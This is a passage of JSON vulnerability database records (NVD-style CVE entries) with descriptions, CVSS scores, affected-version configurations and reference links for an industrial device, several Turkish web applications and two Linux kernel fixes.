Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-3273","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:55.560","lastModified":"2026-06-01T13:16:24.710","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in the SICK ICR890-4 could allow an unauthenticated remote attacker to affect the availability of the device by changing settings of the device such as the IP\naddress based on missing access control."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2024-12970","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-01-06T12:15:06.573","lastModified":"2026-06-01T13:16:25.710","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in TUBITAK BILGEM Pardus OS My Computer allows OS Command Injection.\n\nThis issue affects Pardus OS My Computer: before 0.7.2."},{"lang":"es","value":"Vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo ('Inyección de comando del sistema operativo') en TUBITAK BILGEM Pardus OS My Computer permite la inyección de comandos del sistema operativo. Este problema afecta a Pardus OS My Computer: antes de 0.7.2."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L","baseScore":3.9,"baseSeverity":"LOW","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.5,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-24-1900","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-24-1900","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13152","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-14T13:15:42.170","lastModified":"2026-06-01T13:16:27.967","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BSS Software Mobuy Online Machinery Monitoring Panel allows SQL Injection.\n\nThis issue affects Mobuy Online Machinery Monitoring Panel: before 2.0."},{"lang":"es","value":"La vulnerabilidad de omisión de autorización a través de la clave principal SQL controlada por el usuario en BSS Software Mobuy Online Machinery Monitoring Panel permite la inyección SQL. Este problema afecta a Mobuy Online Machinery Monitoring Panel: antes de 2.0."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":6.0}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0033","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0033","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12917","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-24T15:15:12.383","lastModified":"2026-06-01T13:16:25.190","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Files or Directories Accessible to External Parties vulnerability in Agito Computer Health4All allows Exploiting Incorrectly Configured Access Control Security Levels, Authentication Abuse.\n\nThis issue affects Health4All: before 10.01.2025."},{"lang":"es","value":" La vulnerabilidad de archivos o directorios accesibles a partes externas en Agito Computer Health4All permite explotar niveles de seguridad de control de acceso configurados incorrectamente y abuso de autenticación. Este problema afecta a Health4All: antes del 10.01.2025."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","baseScore":8.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":5.5}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-552"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0042","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0042","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12918","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-24T15:15:12.537","lastModified":"2026-06-01T13:16:25.320","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Agito Computer Health4All allows SQL Injection.\n\nThis issue affects Health4All: before 10.01.2025."},{"lang":"es","value":" Vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Agito Computer Health4All permite la inyección SQL. Este problema afecta a Health4All: antes del 10.01.2025."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0042","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0042","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13148","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-27T15:15:38.583","lastModified":"2026-06-01T13:16:27.500","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"iletisim@usom.gov.tr","tags":["exclusively-hosted-service"]}],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Yukseloglu Filter B2B Login Platform allows SQL Injection.\n\nThis issue affects B2B Login Platform: before 16.01.2025."},{"lang":"es","value":"La vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Yukseloglu Filter B2B Login Platform permite la inyección SQL. Este problema afecta a B2B Login Platform: antes del 16.01.2025."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0045","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0045","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13147","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-03-05T14:15:35.910","lastModified":"2026-06-01T13:16:27.377","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Merkur Software B2B Login Panel allows SQL Injection.\n\nThis issue affects B2B Login Panel: before 15.01.2025."},{"lang":"es","value":"La vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Merkur Software B2B Login Panel permite la inyección SQL. Este problema afecta al Panel de inicio de sesión B2B: antes del 15.01.2025. "}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0054","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0054","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13175","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-07-18T14:15:23.377","lastModified":"2026-06-01T13:16:28.180","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization Bypass Through User-Controlled Key vulnerability in Vidco Software VOC TESTER allows Forceful Browsing.\n\nThis issue affects VOC TESTER: before 12.41.0."},{"lang":"es","value":"La vulnerabilidad de omisión de autorización a través de una clave controlada por el usuario en Vidco Software VOC TESTER permite la navegación forzada. Este problema afecta a VOC TESTER: antes de 12.41.0."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0159","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0159","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2025-38500","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2025-08-12T16:15:27.277","lastModified":"2026-06-01T12:26:08.800","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: interface: fix use-after-free after changing collect_md xfrm interface\n\ncollect_md property on xfrm interfaces can only be set on device creation,\nthus xfrmi_changelink() should fail when called on such interfaces.\n\nThe check to enforce this was done only in the case where the xi was\nreturned from xfrmi_locate() which doesn't look for the collect_md\ninterface, and thus the validation was never reached.\n\nCalling changelink would thus errornously place the special interface xi\nin the xfrmi_net->xfrmi hash, but since it also exists in the\nxfrmi_net->collect_md_xfrmi pointer it would lead to a double free when\nthe net namespace was taken down [1].\n\nChange the check to use the xi from netdev_priv which is available earlier\nin the function to prevent changes in xfrm collect_md interfaces.\n\n[1] resulting oops:\n[    8.516540] kernel BUG at net/core/dev.c:12029!\n[    8.516552] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[    8.516559] CPU: 0 UID: 0 PID: 12 Comm: kworker/u80:0 Not tainted 6.15.0-virtme #5 PREEMPT(voluntary)\n[    8.516565] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[    8.516569] Workqueue: netns cleanup_net\n[    8.516579] RIP: 0010:unregister_netdevice_many_notify+0x101/0xab0\n[    8.516590] Code: 90 0f 0b 90 48 8b b0 78 01 00 00 48 8b 90 80 01 00 00 48 89 56 08 48 89 32 4c 89 80 78 01 00 00 48 89 b8 80 01 00 00 eb ac 90 <0f> 0b 48 8b 45 00 4c 8d a0 88 fe ff ff 48 39 c5 74 5c 41 80 bc 24\n[    8.516593] RSP: 0018:ffffa93b8006bd30 EFLAGS: 00010206\n[    8.516598] RAX: ffff98fe4226e000 RBX: ffffa93b8006bd58 RCX: ffffa93b8006bc60\n[    8.516601] RDX: 0000000000000004 RSI: 0000000000000000 RDI: dead000000000122\n[    8.516603] RBP: ffffa93b8006bdd8 R08: dead000000000100 R09: ffff98fe4133c100\n[    8.516605] R10: 0000000000000000 R11: 00000000000003d2 R12: ffffa93b8006be00\n[    8.516608] R13: ffffffff96c1a510 R14: ffffffff96c1a510 R15: ffffa93b8006be00\n[    8.516615] FS:  0000000000000000(0000) GS:ffff98fee73b7000(0000) knlGS:0000000000000000\n[    8.516619] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[    8.516622] CR2: 00007fcd2abd0700 CR3: 000000003aa40000 CR4: 0000000000752ef0\n[    8.516625] PKRU: 55555554\n[    8.516627] Call Trace:\n[    8.516632]  <TASK>\n[    8.516635]  ? rtnl_is_locked+0x15/0x20\n[    8.516641]  ? unregister_netdevice_queue+0x29/0xf0\n[    8.516650]  ops_undo_list+0x1f2/0x220\n[    8.516659]  cleanup_net+0x1ad/0x2e0\n[    8.516664]  process_one_work+0x160/0x380\n[    8.516673]  worker_thread+0x2aa/0x3c0\n[    8.516679]  ? __pfx_worker_thread+0x10/0x10\n[    8.516686]  kthread+0xfb/0x200\n[    8.516690]  ? __pfx_kthread+0x10/0x10\n[    8.516693]  ? __pfx_kthread+0x10/0x10\n[    8.516697]  ret_from_fork+0x82/0xf0\n[    8.516705]  ? __pfx_kthread+0x10/0x10\n[    8.516709]  ret_from_fork_asm+0x1a/0x30\n[    8.516718]  </TASK>"},{"lang":"es","value":"En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: xfrm: interfaz: se corrige el Use After Free después de cambiar la propiedad collect_md de la interfaz xfrm. Las interfaces xfrm solo se pueden configurar al crear el dispositivo, por lo que xfrmi_changelink() debería fallar al llamarse en dichas interfaces. La comprobación para aplicar esto solo se realizó en el caso en que xi se devolviera desde xfrmi_locate(), que no busca la interfaz collect_md y, por lo tanto, nunca se alcanzó la validación. Llamar a changelink colocaría por error la interfaz especial xi en el hash xfrmi_net-&gt;xfrmi, pero como también existe en el puntero xfrmi_net-&gt;collect_md_xfrmi, provocaría una doble liberación cuando se eliminara el espacio de nombres net [1]. Cambie la comprobación para usar xi de netdev_priv, que está disponible anteriormente en la función, para evitar cambios en las interfaces xfrm collect_md. [1] resulting oops: [ 8.516540] kernel BUG at net/core/dev.c:12029! [ 8.516552] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 8.516559] CPU: 0 UID: 0 PID: 12 Comm: kworker/u80:0 Not tainted 6.15.0-virtme #5 PREEMPT(voluntary) [ 8.516565] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 8.516569] Workqueue: netns cleanup_net [ 8.516579] RIP: 0010:unregister_netdevice_many_notify+0x101/0xab0 [ 8.516590] Code: 90 0f 0b 90 48 8b b0 78 01 00 00 48 8b 90 80 01 00 00 48 89 56 08 48 89 32 4c 89 80 78 01 00 00 48 89 b8 80 01 00 00 eb ac 90 &lt;0f&gt; 0b 48 8b 45 00 4c 8d a0 88 fe ff ff 48 39 c5 74 5c 41 80 bc 24 [ 8.516593] RSP: 0018:ffffa93b8006bd30 EFLAGS: 00010206 [ 8.516598] RAX: ffff98fe4226e000 RBX: ffffa93b8006bd58 RCX: ffffa93b8006bc60 [ 8.516601] RDX: 0000000000000004 RSI: 0000000000000000 RDI: dead000000000122 [ 8.516603] RBP: ffffa93b8006bdd8 R08: dead000000000100 R09: ffff98fe4133c100 [ 8.516605] R10: 0000000000000000 R11: 00000000000003d2 R12: ffffa93b8006be00 [ 8.516608] R13: ffffffff96c1a510 R14: ffffffff96c1a510 R15: ffffa93b8006be00 [ 8.516615] FS: 0000000000000000(0000) GS:ffff98fee73b7000(0000) knlGS:0000000000000000 [ 8.516619] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 8.516622] CR2: 00007fcd2abd0700 CR3: 000000003aa40000 CR4: 0000000000752ef0 [ 8.516625] PKRU: 55555554 [ 8.516627] Call Trace: [ 8.516632]  [ 8.516635] ? rtnl_is_locked+0x15/0x20 [ 8.516641] ? unregister_netdevice_queue+0x29/0xf0 [ 8.516650] ops_undo_list+0x1f2/0x220 [ 8.516659] cleanup_net+0x1ad/0x2e0 [ 8.516664] process_one_work+0x160/0x380 [ 8.516673] worker_thread+0x2aa/0x3c0 [ 8.516679] ? __pfx_worker_thread+0x10/0x10 [ 8.516686] kthread+0xfb/0x200 [ 8.516690] ? __pfx_kthread+0x10/0x10 [ 8.516693] ? __pfx_kthread+0x10/0x10 [ 8.516697] ret_from_fork+0x82/0xf0 [ 8.516705] ? __pfx_kthread+0x10/0x10 [ 8.516709] ret_from_fork_asm+0x1a/0x30 [ 8.516718] "}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-416"}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-416"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1","versionEndExcluding":"6.1.148","matchCriteriaId":"6DF6D064-B873-476E-945E-6A819B5BDED9"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2","versionEndExcluding":"6.6.101","matchCriteriaId":"686C7A1C-35F3-495D-9825-94B5BCED2705"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.7","versionEndExcluding":"6.12.41","matchCriteriaId":"7B9B92B6-A7E5-4697-AB94-8432ED55AA05"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.15.9","matchCriteriaId":"656D6B8C-4D7B-4385-98B6-44EA4AFADD2E"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc1:*:*:*:*:*:*","matchCriteriaId":"6D4894DB-CCFE-4602-B1BF-3960B2E19A01"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc2:*:*:*:*:*:*","matchCriteriaId":"09709862-E348-4378-8632-5A7813EDDC86"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc3:*:*:*:*:*:*","matchCriteriaId":"415BF58A-8197-43F5-B3D7-D1D63057A26E"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc4:*:*:*:*:*:*","matchCriteriaId":"A0517869-312D-4429-80C2-561086E1421C"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc5:*:*:*:*:*:*","matchCriteriaId":"85421F4E-C863-4ABF-B4B4-E887CC2F7F92"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc6:*:*:*:*:*:*","matchCriteriaId":"3827F0D4-5FEE-4181-B267-5A45E7CA11FC"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc7:*:*:*:*:*:*","matchCriteriaId":"7A9C2DE5-43B8-4D73-BDB5-EA55C7671A52"}]}]},{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*","matchCriteriaId":"FA6FEEC2-9F11-4643-8827-749718254FED"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/5918c3f4800a3aef2173865e5903370f21e24f47","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/69a31f7a6a81f5ffd3812c442e09ff0be22960f1","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/a8d4748b954584ab7bd800f1a4e46d5b0eeb5ce4","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/a90b2a1aaacbcf0f91d7e4868ad6c51c5dee814b","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/bfebdb85496e1da21d3cf05de099210915c3e706","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-38502","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2025-08-16T10:15:25.653","lastModified":"2026-06-01T12:24:50.730","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix oob access in cgroup local storage\n\nLonial reported that an out-of-bounds access in cgroup local storage\ncan be crafted via tail calls. Given two programs each utilizing a\ncgroup local storage with a different value size, and one program\ndoing a tail call into the other. The verifier will validate each of\nthe indivial programs just fine. However, in the runtime context\nthe bpf_cg_run_ctx holds an bpf_prog_array_item which contains the\nBPF program as well as any cgroup local storage flavor the program\nuses. Helpers such as bpf_get_local_storage() pick this up from the\nruntime context:\n\n  ctx = container_of(current->bpf_ctx, struct bpf_cg_run_ctx, run_ctx);\n  storage = ctx->prog_item->cgroup_storage[stype];\n\n  if (stype == BPF_CGROUP_STORAGE_SHARED)\n    ptr = &READ_ONCE(storage->buf)->data[0];\n  else\n    ptr = this_cpu_ptr(storage->percpu_buf);\n\nFor the second program which was called from the originally attached\none, this means bpf_get_local_storage() will pick up the former\nprogram's map, not its own. With mismatching sizes, this can result\nin an unintended out-of-bounds access.\n\nTo fix this issue, we need to extend bpf_map_owner with an array of\nstorage_cookie[] to match on i) the exact maps from the original\nprogram if the second program was using bpf_get_local_storage(), or\nii) allow the tail call combination if the second program was not\nusing any of the cgroup local storage maps."},{"lang":"es","value":"En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: bpf: Corrección del acceso fuera de los límites en el almacenamiento local de cgroup Lonial informó que se puede manipular un acceso fuera de los límites en el almacenamiento local de cgroup mediante llamadas de cola. Dados dos programas, cada uno utilizando un almacenamiento local de cgroup con un tamaño de valor diferente, y un programa realizando una llamada de cola en el otro. El verificador validará cada uno de los programas individuales sin problemas. Sin embargo, en el contexto de tiempo de ejecución, bpf_cg_run_ctx contiene un bpf_prog_array_item que contiene el programa BPF, así como cualquier sabor de almacenamiento local de cgroup que use el programa. Los ayudantes como bpf_get_local_storage() recogen esto del contexto de tiempo de ejecución: ctx = container_of(current-&gt;bpf_ctx, struct bpf_cg_run_ctx, run_ctx); storage = ctx-&gt;prog_item-&gt;cgroup_storage[stype]; if (stype == BPF_CGROUP_STORAGE_SHARED) ptr = &amp;READ_ONCE(storage-&gt;buf)-&gt;data[0]; else ptr = this_cpu_ptr(storage-&gt;percpu_buf); Para el segundo programa llamado desde el programa adjunto original, esto significa que bpf_get_local_storage() tomará el mapa del programa anterior, no el suyo. Con tamaños no coincidentes, esto puede resultar en un acceso fuera de los límites no deseado. Para solucionar este problema, necesitamos extender bpf_map_owner con una matriz de storage_cookie[] para que coincida con i) los mapas exactos del programa original si el segundo programa usaba bpf_get_local_storage(), o ii) permitir la combinación de llamadas de cola si el segundo programa no usaba ninguno de los mapas de almacenamiento local de cgroup."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.2}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-125"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.9","versionEndExcluding":"5.15.192","matchCriteriaId":"49EEF657-80AD-46E2-8CA5-C96EFA630696"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.16","versionEndExcluding":"6.1.151","matchCriteriaId":"BC2D0B88-F133-4143-B91D-0A439AA143C0"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2","versionEndExcluding":"6.6.105","matchCriteriaId":"B9364B0C-6B18-422E-8254-73EF0E856875"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*: